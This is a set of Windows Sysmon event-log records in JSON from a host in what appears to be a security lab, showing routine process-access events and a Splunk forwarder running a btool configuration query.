{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3146,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.324\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.324","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3147,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.324\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.324","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3148,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.324\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.324","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3149,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.340\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-0010E51F0500}\r\nTargetProcessId: 2528\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.340","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-0010E51F0500}","TargetProcessId":"2528","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3150,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.346\r\nProcessGuid: {A837DB8D-0239-5F25-0000-00101C210500}\r\nProcessId: 2496\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool web list settings --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-0010E51F0500}\r\nParentProcessId: 2528\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.346","ProcessGuid":"{A837DB8D-0239-5F25-0000-00101C210500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool web list settings --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-0010E51F0500}","ParentProcessId":"2528","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3151,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.340\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-0010E51F0500}\r\nSourceProcessId: 2528\r\nSourceThreadId: 2772\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-00101C210500}\r\nTargetProcessId: 2496\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+146d6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d1d8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.340","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-0010E51F0500}","SourceProcessId":"2528","SourceThreadId":"2772","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-00101C210500}","TargetProcessId":"2496","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+146d6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d1d8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3152,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.340\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-00101C210500}\r\nTargetProcessId: 2496\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.340","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-00101C210500}","TargetProcessId":"2496","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3153,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.340\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.340","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3154,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.340\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.340","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
